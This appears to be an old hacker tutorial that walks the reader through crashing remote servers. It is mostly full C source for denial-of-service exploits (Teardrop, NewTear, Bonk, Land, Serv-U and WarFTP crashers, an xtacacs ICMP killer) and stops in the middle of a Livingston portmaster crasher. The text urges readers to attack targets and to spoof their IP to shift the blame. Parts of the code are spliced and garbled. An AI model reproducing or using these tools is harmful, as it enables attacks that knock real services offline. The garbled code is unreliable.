Crashing && Rebooting servers... ----------------------------------------------- by Phantom If you're reading this, then you're really evil, did you know that ? :) Enough with the formalities...You want to crash a server or maybe to segfault some of the daemons running... Fine by me... First step is to gather all information about the server you are trying to kill. You can telnet to it, see it's web page (if it has one), probe it, and everything.... Now, if it is a Win 95 or Win NT, the job's easy... :) Common to many systems: ------------------------ One good thing is Teardrop (works well with Linux/Win95/WinNT/ and so on, because when you use it, you have the possibility to spoof your IP (for beginners: it could appear like someone else has tried to crash them)... Teardrop: /* * Copyright (c) 1997 route|daemon9 11.3.97 * * Linux/NT/95 Overlap frag bug exploit * * Exploits the overlapping IP fragment bug present in all Linux kernels and * NT 4.0 / Windows 95 (others?) * * Based off of: flip.c by klepto * Compiles on: Linux, *BSD* * * gcc -O2 teardrop.c -o teardrop * OR * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING */ #include #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define PADDING 0x1c /* datagram frame padding for first packet */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */ #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; fprintf(stderr, "teardrop route|daemon9\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } /* * Send two IP fragments with pathological offsets. We use an implementation * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). */ void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; /* * Grab some memory for our packet, align p_ptr to point at the beginning * of our packet, and then fill it with zeros. */ packet = (u_char *)malloc(IPH + UDPH + PADDING); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to work * better. */ p_ptr = &packet[2]; /* IP total length is 2 bytes into the header * / *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *)p_ptr) = FIX(MAGIC); if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } free(packet); } u_long name_resolve(u_char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } Win95-WinNT: ------------- You can use NewTear, Bonk, Land,WarFtpd_exploit and so on... NewTear: /* * gcc -O2 teardrop.c -o teardrop * OR * gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING */ #include #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define PADDING 0x14 /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */ #define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */ #define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can * withstand maybe 5 or 10 sometimes... Experiment. */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; fprintf(stderr, "teardrop route|daemon9\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings:\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } /* * Send two IP fragments with pathological offsets. We use an implementation * independent way of assembling network packets that does not rely on any of * the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). */ void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; /* * Grab some memory for our packet, align p_ptr to point at the beginning * of our packet, and then fill it with zeros. */ packet = (u_char *)malloc(IPH + UDPH + PADDING); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING*2); /* UDP total length */ /* Increases UDP total length to 48 bytes Which is too big! */ if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } /* We set the fragment offset to be inside of the previous packet's * payload (it overlaps inside the previous packet) but do not include * enough payload to cover complete the datagram. Just the header will * do, but to crash NT/95 machines, a bit larger of packet seems to work * better. */ p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */ *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); p_ptr += 4; /* IP offset is 6 bytes into the header */ *((u_short *)p_ptr) = FIX(MAGIC); if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } free(packet); } u_long name_resolve(u_char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } /* EOF */ Bonk: #include #include #include #include #include #include #include #include #include #include #define FRG_CONST 0x3 #define PADDING 0x1c struct udp_pkt { struct iphdr ip; struct udphdr udp; char data[PADDING]; } pkt; int udplen=sizeof(struct udphdr), iplen=sizeof(struct iphdr), datalen=100, psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING, spf_sck; /* Socket */ void usage(void) { fprintf(stderr, "Usage: ./bonk [num]\n"); exit(0); } u_long host_to_ip(char *host_name) { static u_long ip_bytes; struct hostent *res; res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); } void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); } int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt, int dst_prt) { int bs; struct sockaddr_in to; memset(&pkt, 0, psize); /* Fill in ip header */ pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(udplen + iplen + PADDING); pkt.ip.id = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = IP_UDP; pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons(0x2000); /* more to come */ pkt.udp.source = htons(src_prt); /* udp header */ pkt.udp.dest = htons(dst_prt); pkt.udp.len = htons(8 + PADDING); /* send 1st frag */ to.sin_family = AF_INET; to.sin_port = src_prt; to.sin_addr.s_addr = dst_addr; bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */ pkt.ip.tot_len = htons(iplen + FRG_CONST); /* 2nd frag */ bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); return bs; } void main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, src_prt=53, dst_prt=53, bs = 1, pkt_count = 10; /* Default amount */ if (argc < 3) usage(); if (argc == 4) pkt_count = atoi(argv[3]); /* 10 does the trick */ /* Resolve hostnames */ src_addr = host_to_ip(argv[1]); if (!src_addr) quit("bad source host"); dst_addr = host_to_ip(argv[2]); if (!dst_addr) quit("bad target host"); spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs, sizeof(bs)) < 0) quit("IP_HDRINCL"); for (i = 0; i < pkt_count; ++i) { fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); usleep(10000); } printf("Done.\n"); } Land: /* Land attacks: BSDI 2.1 (vanilla) IS vulnerable BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable BSDI 3.0 NOT vulnerable Digital UNIX 4.0 NOT vulnerable FreeBSD 2.2.2-RELEASE IS vulnerable FreeBSD 2.2.5-RELEASE IS vulnerable FreeBSD 2.2.5-STABLE IS vulnerable FreeBSD 3.0-CURRENT IS vulnerable HP-UX 10.20 IS vulnerable IRIX 6.2 NOT vulnerable Linux 2.0.30 NOT vulnerable Linux 2.0.32 NOT vulnerable MacOS 8.0 IS vulnerable NetBSD 1.2 IS vulnerable NeXTSTEP 3.0 IS vulnerable NeXTSTEp 3.1 IS vulnerable Novell 4.11 NOT vulnerable OpenBSD 2.1 IS vulnerable OpenBSD 2.2 (Oct31) NOT vulnerable SCO OpenServer 5.0.4 NOT vulnerable Solaris 2.5.1 IS vulnerable SunOS 4.1.4 IS vulnerable Windows 95 (vanilla) IS vulnerable Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable */ /* land.c by m3lt, FLC crashes a win95 box */ #include #include #include #include #include #include #include #include #include struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); } Warftpd_exploits (2 of 'em)... ------------------------------- /* serv-who.c - 1998 - whiz kills Serv-U ftp on win95 boxes This program makes SERV-U32 cause a stack fault in module KERNEL32.DLL Sometimes after Serv-U crashes, windows becomes slow and non responsive, just an added bonus. Another thing is that if the ftp is running on NT it usually won't crash, just raise CPU usage to 100% while the attack is running. Tested on: i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3 i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2 >>> Thanks to gen for helping me test this. <<< Another thing that might effect this program is how fast the serv-who computer's internet connection is. Or in other words how much faster is it then the victim's link. A Faster one will give a higher success rate. serv-who, like, who the hell are you going to serv now, your crashed */ #include #include #include #include #include #include #include int x, s, i, p, dport; char *str = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX * XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("connect()"); close(sock); return(-4); } printf(" Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { int t; if (argc != 3) { printf("serv-who.c - whiz\n\n"); printf("kills serv-u ftp daemons\n\n"); printf("Usage: %s \n",argv[0]); exit(0); } printf("serv-who.c - whiz\n\n"); if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } p = atoi(argv[2]); open_sock(s,argv[1],p); printf(" Sending crap to %s on port %i... \n", argv[1], p); for (i=0; i<1000; i++) { /* loop is REAL high, most likely */ send(s,str,strlen(str),0x0); /* it will exit with a */ send(s,str,strlen(str)*20+1,0x0); /* "Broken Pipe" error before */ send(s,str,strlen(str)*25+2,0x0); /* finishing the loop */ send(s,str,strlen(str)*30+3,0x0); send(s,str,strlen(str)*35+4,0x0); send(s,str,strlen(str)*40+5,0x0); /* i just went crazy on the sends */ send(s,str,strlen(str)*45+4,0x0); /* pay no attention to them */ send(s,str,strlen(str)*50+5,0x0); send(s,str,strlen(str)*255+4,0x0); send(s,str,strlen(str)*182+5,0x0); send(s,str,strlen(str)*888+4,0x0); send(s,str,strlen(str)*666+5,0x0); send(s,str,strlen(str)*20+1,0x0); send(s,str,strlen(str)*25+2,0x0); send(s,str,strlen(str)*30+3,0x0); send(s,str,strlen(str)*35+4,0x0); send(s,str,strlen(str)*40+5,0x0); send(s,str,strlen(str)*45+4,0x0); send(s,str,strlen(str)*50+5,0x0); send(s,str,strlen(str)*255+4,0x0); send(s,str,strlen(str)*182+5,0x0); send(s,str,strlen(str)*888+4,0x0); send(s,str,strlen(str)*666+5,0x0); } printf("all done\n"); close(s); } /* * WarFTP Killer by A|vin - 02/25/98 * Contact : alvin@another-world.com * * Crashes WarFTP Win95/NT FTP daemon by sending a long * string in user authentification. Tested on WarFTP 1.65. * * Greetz : ackb0o, amplex, AFauveau, ben`be, kewl, * Owlie, Parker, Rapha, Richelieu, Sibere, Voks. * * .oO GeMiNi C0rP iZ EvErYwHeRe Oo. */ #include #include #include #include #include #include #include #include #include struct in_addr resolv (char *name) { static struct in_addr in; unsigned long l; struct hostent *ent; if ((l = inet_addr (name)) != INADDR_NONE) { in.s_addr = l; return in; } if (!(ent = gethostbyname (name))) { in.s_addr = INADDR_NONE; return in; } return *(struct in_addr *) ent->h_addr; } main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port = 21; printf ("WarFTP Killer by A|vin - .oO GeMiNi C0rP iZ EvErYwHeRe Oo.\n"); if (argc < 2) { printf ("Usage : %s [port]\n", argv[0]); exit (0); } if (argc == 3) port = atoi (argv[2]); s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (argv[1]); addr.sin_port = htons (port); connect (s, (struct sockaddr *) &addr, sizeof (addr)); write (s, "USER ", 5); for (i = 1; i <= 500; i++) { write (s, "GeMiNi", 6); } write (s, "\n", 1); write (s, "PASS ", 5); for (i = 1; i <= 500; i++) { write (s, "C0rP", 4); } write (s, "\n", 1); read (s, &c, 1); printf("Done.\n"); } XTACACS in standalone mode: --------------------------- #include #include #include #include #include #include #include #include #include #include int size; #define RESOLVE_QUIET #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) unsigned char *dest_name; unsigned char *origdest_name; unsigned char *spoof_name = NULL; struct sockaddr_in destaddr; unsigned long origdest_addr; unsigned long dest_addr; unsigned long spoof_addr; unsigned char type; unsigned long seq; int x=1; int cize; char *unreachables[] = {"Network unreachable", "Host unreachable", "Protocol unreachable", "Port unreachable", "Fragmantation needed and DF set", "Source route failed", "Network unknown", "Host unknown", "Source host is isolated", "Network administratively unreachable", "Host administratively unreachable", "Network unreachable - type of service", "Host unreachable - type of service"}; void banner(void) { printf("\nxtacacs/udp killer v1.0 by Coaxial Karma\n"); printf("modified version of nEWk.c (HyperioN)\n"); } void usage(const char *progname) { printf("usage:\n"); printf("%s \n\n",progname); printf("\t : address of fake ICMP packet sender\n"); printf("\t : destination of the unreach message\n"); printf("\n"); } int resolve( const char *name, struct sockaddr_in *addr, int port ) { struct hostent *host; bzero(addr,sizeof(struct sockaddr_in)); if (( host = gethostbyname(name) ) == NULL ) { #ifndef RESOLVE_QUIET fprintf(stderr,"unable to resolve host \"%s\" -- ",name); perror(""); #endif return -1; } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); addr->sin_port = htons(port); return 0; } int resolve_one(const char *name, unsigned long *addr, const char *desc) { struct sockaddr_in tempaddr; if (resolve(name, &tempaddr,0) == -1) { printf("error: can't resolve the %s.\n",desc); return -1; } *addr = tempaddr.sin_addr.s_addr; return 0; } int resolve_all(const char *origdest, const char *dest, const char *spoof) { if (resolve_one(origdest,&origdest_addr,"origdest address")) return -1; if (resolve_one(dest,&dest_addr,"dest address")) return -1; if (spoof!=NULL) if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1; destaddr.sin_addr.s_addr = dest_addr; destaddr.sin_family = AF_INET; destaddr.sin_port = 0; } /* * From ping.c (from original nuke.c) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* * This from echok, but with some mods (snuke.c) for unreach. */ inline int icmp_unreach_send(int socket, struct sockaddr_in *address, unsigned char icmp_code, unsigned long spoof_addr, unsigned long s_addr, unsigned long t_addr, unsigned s_port, unsigned t_port, unsigned long seq) { unsigned char packet[4098]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *origip; unsigned char *data; int i; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE); data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE); memset(packet, 0, 4098); ip->saddr = spoof_addr; ip->daddr = t_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 255-random()%15; ip->protocol = IPPROTO_ICMP; ip->tot_len = htons(IPHDRSIZE + size + ICMPHDRSIZE + IPHDRSIZE + 8); ip->check = in_cksum(packet,IPHDRSIZE); origip->saddr = t_addr; /* this is the 'original' header. */ origip->daddr = s_addr; origip->version = 4; origip->ihl = 5; origip->ttl = ip->ttl - random()%15; origip->protocol = IPPROTO_UDP; origip->tot_len = IPHDRSIZE + 30; origip->id = random()%69; origip->check = in_cksum(origip,IPHDRSIZE); *((unsigned int *)data) = htons(s_port); *((unsigned int *)(data+2)) = htons(t_port); *((unsigned long *)(data+4)) = htonl(seq); /* 'original IP header + 64 bits (of bogus TCP header)' made. */ icmp->type = 3; icmp->code = icmp_code; icmp->checksum = in_cksum(icmp,size+ICMPHDRSIZE+IPHDRSIZE+8); /* the entire ICMP packet it now ready. */ #ifdef ICMP_PKT_DEBUG printf("Packet ready. Dump: \n"); for (i=0;i #include #include #include #include #include main() { int sock; struct sockaddr_in server; struct hostent *hp; sock = socket(AF_INET, SOCK_STREAM, 0); /* or sock = socket(AF_INET, SOCK_STREAM, 6); */ hp = gethostbyname("localhost"); bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length); server.sin_family = AF_INET; server.sin_port = 23; connect(sock, (struct sockaddr *)&server, sizeof server); shutdown(sock, 2); server.sin_port = 24; connect(sock, (struct sockaddr *)&server, sizeof server); } Livingstone Portmappers: ------------------------- /* Compiling instructions: Linux: gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c Solaris 2.4: cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef sys_errlist extern char *sys_errlist[]; #endif #ifndef errno extern int errno; #endif /* Inet sockets :-) */ int num=0; int socks[250]; /* show sessions flag */ unsigned short int showflag=0; char * mystrerror(int err) { return(sys_errlist[err]); } void exitprog(void) { while(num--) { shutdown(socks[num-1],0); close(socks[num-1]); } exit(0); } unsigned long int resolver(host) char *host; { unsigned long int ip=0L; if(host && *host && (ip=inet_addr(host))==-1) { struct hostent *he; if(!(he=gethostbyname((char *)host))) ip=0L; else ip=*(unsigned long *)he->h_addr_list[0]; } return(ip); } void usage(void) { puts("pmcrash v0.2a - ComOS System Rebooter :-)\n" "Copyright (C) 1995 LAME Communications\n" "Written by Dr. Delete, Ph.D.\n\n" "Usage: pmcrash [:port] [[:port] ... ]\n"); exit(0); } void main(int argc,char *argv[]) { unsigned short int port=0,x=1; struct sockaddr_in server; char crash[] = { 